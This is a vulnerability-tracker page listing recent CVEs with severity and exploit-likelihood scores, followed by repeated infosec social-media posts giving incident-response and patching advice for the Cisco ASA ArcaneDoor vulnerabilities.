## Updated at UTC 2024-04-30T19:21:04.429061

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2024-20358 6.7 0.04% 12 0 2024-04-30T14:47:57.753000 A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functiona
CVE-2024-27322 8.8 0.04% 8 0 2024-04-29T21:30:34 Deserialization of untrusted data can occur in the R statistical programming lan
CVE-2024-27956 9.9 0.05% 1 1 template 2024-04-29T09:31:52 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2024-28076 7.0 0.07% 2 0 2024-04-29T05:02:34 The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerab
CVE-2024-2961 None 0.04% 28 1 2024-04-29T05:02:33 The iconv() function in the GNU C Library versions 2.39 and older may overflow t
CVE-2024-3847 None 0.04% 2 0 2024-04-28T06:31:27 Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60
CVE-2024-3846 None 0.04% 2 0 2024-04-28T06:31:27 Inappropriate implementation in Prompts in Google Chrome prior to 124.0.6367.60
CVE-2024-3914 None 0.05% 2 0 2024-04-28T06:31:27 Use after free in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote at
CVE-2024-3845 None 0.04% 2 0 2024-04-28T06:31:27 Inappropriate implementation in Networks in Google Chrome prior to 124.0.6367.60
CVE-2024-3843 None 0.04% 2 0 2024-04-28T06:31:27 Insufficient data validation in Downloads in Google Chrome prior to 124.0.6367.6
CVE-2024-3834 8.8 0.08% 2 0 2024-04-28T06:31:26 Use after free in Downloads in Google Chrome prior to 124.0.6367.60 allowed a re
CVE-2024-3837 8.8 0.08% 2 0 2024-04-28T06:31:26 Use after free in QUIC in Google Chrome prior to 124.0.6367.60 allowed a remote
CVE-2024-3840 None 0.04% 2 0 2024-04-28T06:31:26 Insufficient policy enforcement in Site Isolation in Google Chrome prior to 124.
CVE-2024-3833 None 0.04% 2 0 2024-04-28T06:31:26 Object corruption in WebAssembly in Google Chrome prior to 124.0.6367.60 allowed
CVE-2024-3841 None 0.04% 2 0 2024-04-28T06:31:26 Insufficient data validation in Browser Switcher in Google Chrome prior to 124.0
CVE-2024-3839 6.5 0.08% 2 0 2024-04-28T06:31:26 Out of bounds read in Fonts in Google Chrome prior to 124.0.6367.60 allowed a re
CVE-2024-3844 None 0.04% 2 0 2024-04-28T03:30:22 Inappropriate implementation in Extensions in Google Chrome prior to 124.0.6367.
CVE-2024-32764 9.9 0.04% 2 0 2024-04-26T15:32:22.523000 A missing authentication for critical function vulnerability has been reported t
CVE-2024-32766 10.0 0.04% 2 0 2024-04-26T15:32:22.523000 An OS command injection vulnerability has been reported to affect several QNAP o
CVE-2024-27124 7.5 0.04% 2 0 2024-04-26T15:30:34 An OS command injection vulnerability has been reported to affect several QNAP o
CVE-2024-4040 10.0 1.60% 54 7 2024-04-26T15:25:47.270000 A server side template injection vulnerability in CrushFTP in all versions befor
CVE-2024-20359 6.0 0.13% 52 1 2024-04-26T15:25:02.773000 A vulnerability in a legacy capability that allowed for the preloading of VPN cl
CVE-2024-20353 8.6 0.23% 50 1 2024-04-26T15:22:27.803000 A vulnerability in the management and VPN web servers for Cisco Adaptive Securit
CVE-2024-4006 4.3 0.04% 4 0 2024-04-25T15:30:45 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2024-4024 7.3 0.04% 4 0 2024-04-25T15:30:38 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2024-1347 4.3 0.04% 4 0 2024-04-25T12:30:56 An issue has been discovered in GitLab CE/EE affecting all versions before 16.9.
CVE-2024-2829 7.5 0.04% 4 0 2024-04-25T12:30:51 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2024-2434 8.5 0.04% 4 0 2024-04-25T12:30:50 An issue has been discovered in GitLab affecting all versions of GitLab CE/EE 1
CVE-2024-3177 2.7 0.04% 2 1 2024-04-25T06:16:00.237000 A security issue was discovered in Kubernetes where users may be able to launch
CVE-2024-20295 8.8 0.04% 2 0 2024-04-24T21:32:04 A vulnerability in the CLI of the Cisco Integrated Management Controller (IMC) c
CVE-2024-20356 8.7 0.04% 11 1 2024-04-24T21:31:56 A vulnerability in the web-based management interface of Cisco Integrated Manage
CVE-2024-28848 8.8 0.04% 1 0 2024-04-24T17:06:02 ### SpEL Injection in `GET /api/v1/policies/validation/condition/` (`GHSL-
CVE-2024-28847 8.8 0.04% 1 0 2024-04-24T17:06:01 ### SpEL Injection in `PUT /api/v1/events/subscriptions` (`GHSL-2023-251`) ***P
CVE-2024-2957 0 0.04% 2 0 2024-04-24T16:15:08.880000 Rejected reason: **DUPLICATE*** Please use CVE-2024-1983 instead.
CVE-2024-28253 9.4 0.04% 1 0 2024-04-24T14:34:35 ### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`) **Please note, o
CVE-2024-3400 10.0 95.36% 84 33 template 2024-04-23T19:57:25.207000 A command injection as a result of arbitrary file creation vulnerability in the
CVE-2024-3832 None 0.04% 2 0 2024-04-23T18:30:39 Object corruption in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote
CVE-2024-3838 5.5 0.05% 2 0 2024-04-23T18:30:39 Inappropriate implementation in Autofill in Google Chrome prior to 124.0.6367.60
CVE-2024-29003 7.5 0.04% 1 0 2024-04-23T15:30:35 The SolarWinds Platform was susceptible to a XSS vulnerability that affects the
CVE-2024-1480 7.5 0.04% 8 0 2024-04-20T00:31:58 Unitronics Vision Standard line of controllers allow the Information Mode passwo
CVE-2024-29991 5.0 0.06% 4 0 2024-04-19T18:31:16 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability
CVE-2024-29204 9.8 0.04% 5 0 2024-04-19T13:10:25.637000 A Heap Overflow vulnerability in WLAvalancheService component of Ivanti Avalanch
CVE-2024-27984 7.1 0.07% 2 0 2024-04-19T13:10:25.637000 A Path Traversal vulnerability in web component of Ivanti Avalanche before 6.4.3
CVE-2024-28185 10.0 0.04% 2 0 2024-04-18T18:25:55.267000 Judge0 is an open-source online code execution system. The application does not
CVE-2024-29001 7.5 0.04% 1 0 2024-04-18T09:30:53 A SolarWinds Platform SWQL Injection Vulnerability was identified in the user in
CVE-2024-28073 8.5 0.04% 1 0 2024-04-17T18:31:37 SolarWinds Serv-U was found to be susceptible to a Directory Traversal Remote Co
CVE-2024-22354 7.0 0.04% 2 0 2024-04-17T12:48:07.510000 IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server
CVE-2024-21111 7.8 0.04% 4 1 2024-04-17T12:48:07.510000 Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (comp
CVE-2024-31497 None 0.05% 11 2 2024-04-17T00:31:29 In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an
CVE-2024-2279 8.7 0.04% 2 0 2024-04-12T03:30:44 An issue has been discovered in GitLab CE/EE affecting all versions starting fro
CVE-2024-21338 7.8 0.11% 2 3 2024-04-11T21:30:45 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-20697 7.3 0.06% 3 0 2024-04-11T21:30:44 Windows Libarchive Remote Code Execution Vulnerability
CVE-2023-41266 8.2 85.11% 2 1 template 2024-04-11T21:06:16 A path traversal vulnerability found in Qlik Sense Enterprise for Windows for ve
CVE-2024-26198 8.8 0.53% 2 0 2024-04-11T20:15:35.127000 Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2024-28913 8.8 0.09% 2 0 2024-04-10T13:24:00.070000 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28908 8.8 0.09% 2 0 2024-04-10T13:24:00.070000 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29046 8.8 0.09% 2 0 2024-04-10T13:24:00.070000 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28914 8.8 0.09% 2 0 2024-04-10T13:24:00.070000 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29982 8.8 0.09% 2 0 2024-04-10T13:24:00.070000 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28933 8.8 0.09% 2 0 2024-04-10T13:24:00.070000 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28937 8.8 0.09% 2 0 2024-04-10T13:24:00.070000 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28911 8.8 0.09% 2 0 2024-04-10T13:24:00.070000 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28942 8.8 0.04% 2 0 2024-04-09T18:30:37 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28943 8.8 0.09% 2 0 2024-04-09T18:30:37 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29984 8.8 0.09% 2 0 2024-04-09T18:30:37 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29044 8.8 0.09% 2 0 2024-04-09T18:30:37 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28945 8.8 0.09% 2 0 2024-04-09T18:30:37 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29048 8.8 0.09% 2 0 2024-04-09T18:30:37 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29056 4.3 0.07% 2 0 2024-04-09T18:30:36 Windows Authentication Elevation of Privilege Vulnerability
CVE-2024-28932 8.8 0.04% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28941 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28940 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29045 7.5 0.09% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28935 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28936 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28939 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29047 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28934 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28930 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28910 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28944 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29983 8.8 0.04% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28931 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29043 8.8 0.04% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28926 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28927 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28938 8.8 0.09% 2 0 2024-04-09T18:30:36 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-26218 7.8 0.04% 6 1 2024-04-09T18:30:35 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26248 7.5 0.05% 2 0 2024-04-09T18:30:35 Windows Kerberos Elevation of Privilege Vulnerability
CVE-2024-28912 8.8 0.09% 2 0 2024-04-09T18:30:35 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28909 8.8 0.09% 2 0 2024-04-09T18:30:35 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28906 8.8 0.09% 2 0 2024-04-09T18:30:35 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-29985 8.8 0.09% 2 0 2024-04-09T18:30:28 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28915 8.8 0.04% 2 0 2024-04-09T18:30:27 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-28929 8.8 0.09% 2 0 2024-04-09T18:30:27 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-3273 7.3 83.36% 4 8 template 2024-04-07T15:30:32 A vulnerability, which was classified as critical, was found in D-Link DNS-320L,
CVE-2024-1086 7.8 0.04% 2 3 2024-04-06T05:01:36 A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables compon
CVE-2024-3272 9.8 1.27% 2 1 2024-04-05T06:30:47 ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very cr
CVE-2023-41265 9.6 87.59% 2 1 template 2024-04-04T07:16:03 An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windo
CVE-2023-38831 7.8 44.37% 6 43 2024-04-04T07:09:58 RARLabs WinRAR before 6.23 allows attackers to execute arbitrary code when a use
CVE-2023-32054 7.3 0.04% 2 0 2024-04-04T05:57:40 Volume Shadow Copy Elevation of Privilege Vulnerability
CVE-2023-34362 9.8 95.55% 2 9 template 2024-04-04T04:29:06 In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.
CVE-2024-22247 4.8 0.04% 1 0 2024-04-02T18:31:17 VMware SD-WAN Edge contains a missing authentication and protection mechanism vu
CVE-2024-22248 7.1 0.04% 1 0 2024-04-02T18:31:17 VMware SD-WAN Orchestrator contains an open redirect vulnerability. A malicious
CVE-2024-22246 7.4 0.04% 1 0 2024-04-02T18:31:16 VMware SD-WAN Edge contains an unauthenticated command injection vulnerability p
CVE-2024-2389 10.0 0.44% 17 25 template 2024-04-02T15:30:43 In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command inj
CVE-2023-44487 5.3 73.93% 2 12 2024-04-01T16:13:53 ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to t
CVE-2024-3128 2.4 0.04% 1 0 2024-04-01T15:30:38 ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problem
CVE-2024-3094 10.0 10.08% 8 60 template 2024-03-29T18:30:50 Malicious code was discovered in the upstream tarballs of xz, starting with vers
CVE-2023-48788 9.8 56.22% 4 1 2024-03-19T09:30:32 A improper neutralization of special elements used in an sql command ('sql injec
CVE-2023-48795 5.9 96.23% 2 1 template 2024-03-14T21:48:10 ### Summary Terrapin is a prefix truncation attack targeting the SSH protocol.
CVE-2024-27199 7.3 0.90% 2 3 template 2024-03-11T15:15:47.663000 In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limite
CVE-2024-27198 9.8 97.24% 2 9 template 2024-03-11T15:15:47.483000 In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform
CVE-2024-21901 4.7 0.04% 2 0 2024-03-08T18:30:35 A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploi
CVE-2024-21900 4.3 0.05% 2 0 2024-03-08T18:30:35 An injection vulnerability has been reported to affect several QNAP operating sy
CVE-2024-21899 9.8 0.09% 2 0 2024-03-08T18:30:35 An improper authentication vulnerability has been reported to affect several QNA
CVE-2024-1709 10.0 94.46% 2 4 template 2024-03-01T05:06:28 ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Byp
CVE-2024-1708 8.5 0.05% 2 2 2024-02-22T15:30:39 ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner
CVE-2024-1212 10.0 0.21% 4 1 template 2024-02-21T18:31:06 Unauthenticated remote attackers can access the system through the LoadMaster ma
CVE-2020-3259 7.5 1.93% 2 0 2024-02-16T02:00:03.227000 A vulnerability in the web services interface of Cisco Adaptive Security Applian
CVE-2023-50386 None 87.24% 2 1 2024-02-09T21:53:15 Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of F
CVE-2023-20198 10.0 87.33% 2 28 template 2024-02-03T05:07:29 Cisco is aware of active exploitation of a previously unknown vulnerability in t
CVE-2024-0204 9.8 53.86% 2 6 template 2024-02-02T18:30:29 Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauth
CVE-2023-46805 8.2 96.56% 2 8 template 2024-01-31T05:07:17 An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 2
CVE-2024-21887 9.1 97.33% 2 12 template 2024-01-22T18:31:16 A command injection vulnerability in web components of Ivanti Connect Secure (9.
CVE-2023-22518 9.1 96.63% 2 8 template 2023-12-28T05:05:44 All versions of Confluence Data Center and Server are affected by this unexploit
CVE-2023-48365 9.6 0.08% 2 0 2023-12-08T05:05:23 Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthentica
CVE-2023-4473 9.8 0.07% 5 0 2023-12-06T03:30:26 A command injection vulnerability in the web server of the Zyxel NAS326 firmware
CVE-2023-4474 9.8 0.10% 5 0 2023-12-06T03:30:26 The improper neutralization of special elements in the WSGI server of the Zyxel
CVE-2023-36396 7.8 0.11% 2 0 2023-11-14T18:30:29 Windows Compressed Folder Remote Code Execution Vulnerability
CVE-2021-44228 10.0 97.56% 2 100 template 2023-11-07T03:39:36.897000 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12
CVE-2023-3094 6.3 0.06% 2 3 2023-11-06T05:04:16 A vulnerability classified as critical has been found in code-projects Agro-Scho
CVE-2023-42793 9.8 97.10% 2 7 template 2023-10-03T15:44:06.660000 In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on T
CVE-2022-3602 9.8 6.08% 4 12 2023-08-17T05:02:52 A buffer overrun can be triggered in X.509 certificate verification, specificall
CVE-2023-1389 8.8 6.88% 3 2 2023-08-11T15:30:44 TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 conta
CVE-2023-24932 6.7 13.87% 2 1 2023-05-15T18:18:30.897000 Secure Boot Security Feature Bypass Vulnerability
CVE-2023-21746 7.8 0.04% 2 1 2023-05-06T05:00:40 Windows NTLM Elevation of Privilege Vulnerability.
CVE-2022-37955 7.8 0.06% 2 0 2023-04-19T05:08:54 Windows Group Policy Elevation of Privilege Vulnerability.
CVE-2023-21036 5.5 0.04% 1 6 2023-04-06T05:08:38 In BitmapExport.java, there is a possible failure to truncate images due to a lo
CVE-2014-0160 7.5 97.48% 2 65 2023-02-18T05:04:47 The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not p
CVE-2022-38028 7.8 0.05% 15 0 2023-02-03T05:02:37 Windows Print Spooler Elevation of Privilege Vulnerability.
CVE-2017-8570 7.8 97.34% 6 9 2023-02-02T05:01:39 Microsoft Office allows a remote code execution vulnerability due to the way tha
CVE-2021-3129 9.8 97.46% 2 28 template 2023-02-01T05:05:19 Ignition before 2.5.2, as used in Laravel and other products, allows unauthentic
CVE-2006-4304 None 6.64% 4 0 2023-02-01T05:01:22 Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 throu
CVE-2021-21975 None 97.40% 4 10 template 2023-01-29T05:07:01 Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)
CVE-2021-26887 7.8 0.06% 2 0 2023-01-29T05:06:49 Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability
CVE-2018-13379 None 97.41% 4 12 template 2023-01-28T05:05:41 An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal"
CVE-2021-26085 5.3 96.32% 4 2 template 2023-01-27T05:03:06 Affected versions of Atlassian Confluence Server allow remote attackers to view
CVE-2024-2782 0 0.00% 8 0 N/A
CVE-2024-28189 0 0.04% 4 0 N/A
CVE-2024-29021 0 0.04% 4 0 N/A
CVE-2024-4058 0 0.00% 1 0 N/A
CVE-2024-4059 0 0.00% 1 0 N/A
CVE-2024-4060 0 0.00% 1 0 N/A
CVE-2024-202358 0 0.00% 4 0 N/A
CVE-2023-3824 0 0.08% 2 2 N/A
CVE-2024-32462 0 0.04% 6 0 N/A
CVE-2024-202359 0 0.00% 2 0 N/A
CVE-2024-202353 0 0.00% 2 0 N/A
CVE-2024-27282 0 0.00% 3 0 N/A
CVE-2024-32657 0 0.04% 2 0 N/A
CVE-2023-42757 0 0.00% 2 0 N/A
CVE-2024-26132 0 0.04% 1 0 N/A
CVE-2024-26131 0 0.04% 1 0 N/A
CVE-2024-28254 0 0.05% 1 0 N/A
CVE-2024-28255 0 0.09% 1 1 template N/A
CVE-2024-20373 0 0.00% 1 0 N/A

CVE-2024-20358
(6.7 MEDIUM)

EPSS: 0.04%

updated 2024-04-30T14:47:57.753000

12 posts

A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functionality that is available in Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system with root-level privileges. Administrator-level privileges are required to exploit this vulnerability. This vulnera

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

